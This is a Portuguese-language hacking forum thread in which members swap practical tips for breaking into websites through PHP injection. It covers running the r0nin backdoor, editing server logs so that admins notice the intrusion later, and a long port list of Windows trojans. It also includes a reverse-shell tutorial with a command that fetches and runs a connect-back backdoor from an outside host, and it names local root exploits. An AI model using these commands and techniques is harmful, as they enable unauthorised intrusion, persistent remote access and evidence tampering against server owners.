PHP Injection - O Fim das Dúvidas

[Bruno Candido]

editar demora muito
e se tu fizer um trabalho bem feito, não fica nenhuma pista não.. euiahhea
^^
mas se tiver paciencia pra editar faz isso :P

[Simplicity]

editar demora muito
e se tu fizer um trabalho bem feito, não fica nenhuma pista não.. euiahhea
^^
mas se tiver paciencia pra editar faz isso :P

se vc quiser que alguem descubra q vc invadiu apaga o log, se vc quiser que o admin ñ saiba ou q pelo menos retarde a descoberta edite o log :lol:

po sem comentírios :wink:

[Quicky]

velho.. uma dúvida... depois que eu uppo o backdoor.. e eu o executo. é só ir no telnet e dí um telnet ip do site 23 e go go go ? @.@"

diz aew @.@"

ops:

[Bruno Candido]

a porta da backdoor é 1666 ;P

[Quicky]

tipo.. eu sei como conecta via telnet :lol:
tio dsoul ensinou a um tempo atrís =D

só que tipo... isso nao varia de backdoor pra backdoor?! ao menos eu pensava que sim.. tipo.. o site q eu ownei jí havia sido ownado por um bucado de gente. .e lí no meio.. axei r0nin só que sem terminação.. pensei de inicio que fosse uma pasta.. mas daà eu li em algum canto que arquivos unix nao possuem terminação.. logo pensei então que o r0nin fosse um backdoor feito em unix... daà eu pedi pra executar ele no servidor hospedeiro da pígina.. e logo em seguida tentei conectar via telnet no endereço do site pela porta 23 que é a padrão do serviço telnet.. porem vi que nao deu.. aà vcs disseram que era 1666 daà tentei pela 1666 e nada :S se nao fosse pedir demais.. poderiam me passar uma listinha de backdoor? o rog jí me disse 2 nomes.. porém eu nao os encontrei

[rog]

ae dsoul

nao e por nada mas o simplicity tem muita razao

as dicas sao so para ajudar vc

apagar os logos e flagrante para qualquer admin seja ele o mais fraco possivel

depois e possivel restaurar os arquivos
no caso em que vc invade por connexao reversa e por passar por um roteador, no roteador vc e loggado e traçavel

de qualquer forma os ISP loggam as connexoes tambem

isso quer dizer que mesmo apagando os logs da para traçar vc

a differença fica na categoria penal em que vc vai se encontrar caso vc esteja procssado

na europa e de um mes a um ano de cana pour invasao
dois meses a dois anos pour uma invasao com defaçe de arquivo

como vc pode ver e o dobrado

era so isso, sempre e bom saber quais sao as implicaçoes de uma açao antes de fazer la

abraço

rog

[Simplicity]

tipo.. eu sei como conecta via telnet :lol:
tio dsoul ensinou a um tempo atrís =D

só que tipo... isso nao varia de backdoor pra backdoor?! ao menos eu pensava que sim.. tipo.. o site q eu ownei jí havia sido ownado por um bucado de gente. .e lí no meio.. axei r0nin só que sem terminação.. pensei de inicio que fosse uma pasta.. mas daà eu li em algum canto que arquivos unix nao possuem terminação.. logo pensei então que o r0nin fosse um backdoor feito em unix... daà eu pedi pra executar ele no servidor hospedeiro da pígina.. e logo em seguida tentei conectar via telnet no endereço do site pela porta 23 que é a padrão do serviço telnet.. porem vi que nao deu.. aà vcs disseram que era 1666 daà tentei pela 1666 e nada :S se nao fosse pedir demais.. poderiam me passar uma listinha de backdoor? o rog jí me disse 2 nomes.. porém eu nao os encontrei

Quick o certo ñ é saber a lista de backdoor mas sim saber como eles funcionam, vou dar um exemplo: vamos supor que estamos conversando no msn e te aplico uma engenharia social e vc executa um arquivo(servidor) que esta programado para abrir a porta dos fundos 4321 de sua míquina, pronto vc executou o arquivo infectado ou seja sua míquina estarí rodando um servidor que consequentemente estarí com a porta 4321 aberta, mas e agora, bom como eu vou explorar essa porta???, é simples um backdoor funciona como cliente/servidor -> o servidor vc executou agora eu utilizo um cliente para explorar a porta 4321 de sua míquina e pronto assim que funciona um backdoor, então o backdoor r0nin funciona igualzinho -> o r0nin é o servidor que vc executou certo, quando vc executou ele, abriu a porta 1666, agora ele foi programado de uma tal forma em que vc utiliza o telnet como o cliente, ou seja, cada backdoor tem seu próprio cliente sim, mas esse foi programado como jí explicado, espero que tenha entendido, abaixo vai + 1 explicação e a lista dos backdoors + as portas vlw.

BACKDOOR

Um programa de controle remoto que funciona na base do cliente/servidor, se alguém(vitima) tem o servidor instalado em sua míquina outro alguém(hacker) pode controlar essa míquina à distância se tiver o cliente do backdoor instalado. Chama-se backdoor porque abre uma porta dos fundos para acesso de bisbilhoteiros. Existem centenas de backdoors diferentes e os arquivos Servidor são instalados através da execução de arquivos anexos aos e-mails ou por outra via.

Aqui vai a lista de backdoors para Windows

Porta 21 - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash
Porta 23 - Tiny Telnet Server
Porta 25 - Antigen, Email Password Sender, Haebu Coceda, Terminator, . Shtrilitz Stealth, WinPC, WinSpy
Porta 31 - Hackers Paradise, Master's Paradise 8
Porta 121 - BO jammerkillahV
Porta 456 - Hackers Paradise
Porta 555 - Ini-Killer, Phase Zero, Stealth Spy
Porta 666 - Satanz Backdoor, Attack FTP
Porta 1001 - Silencer, WebEx
Porta 1011 - Doly Trojan
Porta 1033 - NetSpy
Porta 1080 - Wingate (Socks-Proxy)
Porta 1170 - Psyber Stream Server, Voice, Streaming Audio Trojan
Porta 1234 - Ultors Trojan
Porta 1243 - SubSeven
Porta 1245 - VooDoo Doll
Porta 1492 - FTP99CMP
Porta 1509 - Psyber Streaming Server
Porta 1600 - Shivka-Burka
Porta 1666 - r0nin ->
Porta 1807 - SpySender
Porta 1981 - Shockrave
Porta 1999 - BackDoor
Porta 2001 - Trojan Cow
Porta 2023 - Ripper
Porta 2115 - Bugs
Porta 2140 - Deep Throat, The Invasor
Porta 2565 - Striker
Porta 2583 - WinCrash 2.0
Porta 2801 - Phineas Phucker
Porta 3024 - WinCrash
Porta 3129 - Masters Paradise
Porta 3150 - Deep Throat, The Invasor
Porta 3700 - Portal of Doom
Porta 4590 - ICQTrojan
Porta 4950 - IcqTrojen
Porta 5000 - Sockets de Troie
Porta 5001 - Sockets de Troie
Porta 5321 - Firehotcker
Porta 5400 - Blade Runner
Porta 5401 - Blade Runner
Porta 5402 - Blade Runner
Porta 5569 - Robo-Hack
Porta 5742 - WinCrash
Porta 6400 - The tHing
Porta 6670 - DeepThroat
Porta 6771 - DeepThroat
Porta 6883 - DeltaSource
Porta 6939 - Indoctrination
Porta 6969 - GateCrasher, Priority
Porta 7000 - Remote Grab
Porta 7300 - NetMonitor
Porta 7301 - NetMonitor
Porta 7306 - NetMonitor
Porta 7307 - NetMonitor
Porta 7308 - NetMonitor
Porta 7789 - ICKiller
Porta 9872 - Portal of Doom
Porta 9873 - Portal of Doom
Porta 9874 - Portal of Doom
Porta 9875 - Portal of Doom
Porta 9989 - iNi-Killer
Porta 10067 - Portal of Doom
Porta 10167 - Portal of Doom
Porta 11000 - Senna Spy
Porta 11223 - Progenic trojan
Porta 12223 - Hack´99 KeyLogger
Porta 12345 - GabanBus, NetBus
Porta 12346 - GabanBus, NetBus
Porta 12361 - Whack-a-mole
Porta 12362 - Whack-a-mole
Porta 16969 - Priority
Porta 20001 - Millennium
Porta 20034 - NetBus 2 Pro, NetRex Pro
Porta 21544 - GirlFriend
Porta 22222 - Prosiak 0.47
Porta 23456 - Evil FTP, Ugly FTP, WhackJob
Porta 26274 - Delta
Porta 30029 - AOLTrojan1.1
Porta 30100 - NetSphere
Porta 30303 - Sockets de Troie 2.5
Porta 30999 - Kuang
Porta 31337 - Back Orifice
Porta 31338 - Back Orifice, DeepBO
Porta 31339 - NetSpy DK
Porta 31666 - BOWhack
Porta 31787 - Hack'a'tack
Porta 33333 - Prosiak
Porta 34324 - BigGluck, TN, Tiny Telnet Server
Porta 40412 - The Spy
Porta 40421 - Master's Paradise
Porta 40422 - Master's Paradise
Porta 40423 - Master's Paradise
Porta 40426 - Master's Paradise
Porta 47262 - Delta
Porta 50505 - Sockets de Troie
Porta 50766 - Fore
Porta 53001 - Remote Windows Shutdown
Porta 61466 - Telecommando
Porta 65000 - Devil :lol: :lol:

[Bruno Candido]

bem Quicky, se após você rodar a r0nin e tentar conectar no ip na porta 1666 e não funcionar, é porque ela tem firewall..
daqui a pouco vou ensinar a rodar reverso.. que ajuda um pouco (:

[jokerbr]

consegui conectar ao shell de alguns sites vulneraveis usando a conexao reversa com a ajuda de uma explicacao do DSOUL(vlw mano). achei tb um texto falando sobre Reverso:

Método muito eficiente para ganhar shell numa míquina. Ganha shell
reversamente.
Windows: Baixe o netcat para windows e no Prompt do MSDOS (na
pasta que o nc se encontra), digite: nc -vv -l -p 15 , onde 15
pode ser escolhido de acordo com sua preferência. Esta porta serí a que
realizarí a conexão.

Agora, voltando para o browser, na cmd digite o seguinte comando:
cd /var/tmp;wget http://www.site.do.dc.com/dc;chmod 777 dc;./dc IP porta

cd /var/tmp -> Mesmo que para backdoor.
wget http://www.site.do.dc.com/dc -> | | | | , mas é logico, com o
endereço da dc.
./dc IP porta -> onde IP é o SEU IP e porta é a porta
que você escolheu no netcat.
---
editado por mim..
o cara aqui se complicou na hora de explicar mas vai um exemplo pra botar na CMD
cd /tmp;wget http://unixclan.no-ip.org/~1228/backdoor/dc.txt;perl dc.txt 127.0.0.1 15

onde 127.0.0.1 entra seu ip eh claro, e 15 eh a porta q vc escolheu pra sniffar com o NETCAT
---

Feito isso, se ocorrer tudo certo, aparecerí como resultado:

Connect Back Backdoor
[*] Dumping Arguments[*] Resolving Host Name[*] Connecting...[*] Spawning Shell[*] Detached

Isto significa que você se conectou na shell! Agora, ví para o
MSDOS e vamos para o próximo passo.

Se aparecer

Connect Back Backdoor
[*] Dumping Arguments[*] Resolving Host Name[*] Connecting...
[-] Unable to Connect

confira os dados (seu ip, porta, netcat, etc). Se insistir, sua
rede não aceita este tipo de conexão. Tente outras portas (como 80, 22,
15, etc).



---------------------------------- Na Shell


Comandos bísicos

Eu ia passar direto nessa parte, mas sei que muitos não conhecem
os comandos unix. Então vamos conhecer alguns:

ls -> Lista arquivos. Pode ser combinado com -a (mostra
ocultos) e -l (mostra detalhadamente). Ex: ls -la
(mostra detalhadamente os arquivos, inclusive ocultos).
uname -a -> Mostra informações do sistema, como versão do kernel,
nome, e outras coisas uteis.
id -> Mostra sua id.
w -> Lista os usuírios logados no momento.
cp -> Copia arquivos. Sintaxe: cp arquivo /destino/
mv -> Move arquivos. Sintexe: mv arquivo /destino/
rm -> Remove arquivos. Se combinado com -rf , remove todos
os arquivos setados, inclusive pastas
mkdir -> Cria diretorio
rmdir -> Exclui diretorio
find -> Procura por arquivos/pastas. Ex: " find /etc -name
httpd.conf " procura pelo httpd.conf na pasta /etc
pwd -> Mostra em que pasta você estí localizado
cat -> Exibe o conteúdo de um arquivo na tela

head -> Exibe linhas do inàcio do arquivo
tail -> || || || final do arquivo
ctrl+c -> Sai/killa um programa
ctrl+r -> Busca comando digitado no history do bash
ps -auxw -> Lista todos os processos do sistema
netstat -na -> Status da conexão
kill -9 -> Mata processo. Sintaxe: kill -9 PID DO PROCESSO
kill -HUP -> Reinicia processo. Sintaxe: kill -HUP ID DO PROCESSO
pico -> Editor de texto. Sintaxe: pico arquivo
vi -> | | vi arquivo


Salvando resultados em arquivos
comando > /arquivo/onde/serí/armazenado
Ex: ls /etc > /tmp/s.txt salva todo o resultado da listagem de
/etc no arquivo /tmp/s.txt

Adicionando linhas em arquivos
echo ' linha ' >> /arquivo/onde/serí/incluido

Descompactando arquivos (os mais comuns)
.tar -> tar xvf arquivo.tar
.tar.gz -> tar zxvf arquivo.tar.gz
.tar.bz2 -> tar jxvf arquivo.tar.bz2
.zip -> unzip arquivo.zip


Compactando arquivos (os mais comuns)
.tar -> tar cvf destino.tar ARQUIVO
.tar.gz -> tar cvf destino.tar ARQUIVO | gzip destino.tar
.tar.bz2 -> tar cvf destino.tar ARQUIVO | bzip2 destino.tar
.zip -> zip destino.zip ARQUIVO


Bom.. procure um tutorial de linux para maiores esclarecimentos



9) Ganhando acesso root

Para ganhar acesso root localmente numa míquina, vai depender
muito. Você precisa de um exploit local e o sistema deve estar vulnerível.
Simples, basta baixar, escolher as permissões e executar.. assim
como você faz com o backdoor.. mas isto você faz na shell.
Os mais comuns no momento são mremap , brk e kmod para kernel
abaixo de 2.4.24
Se tudo ocorrer corretamente rootando a míquina, ao digitar o
comando "id" você verí

bash-2.05b# id
uid=0(root) gid=0(root)

-----------------------------------
FONTE http://www.techroot.org
-----------------------------------
Link do NETCAT pra windows- http://www.computec.ch/request.php?467

[Quicky]

:shock:
po kara.. me senti humilhado agora ops:

nossa.. fui um animal heoaheohUAHWOHoahwuHOAWUhoaw eu sei uq é um backdoor... o problema é que eu pensei que esses para sites fossem diferentes xD
q mico ops:
se é assim.. vou por um polyserver e acessar via ftp ou telnet :wink:
=D

brigado.. agora é só pacotar q nem diz o dsoul :wink: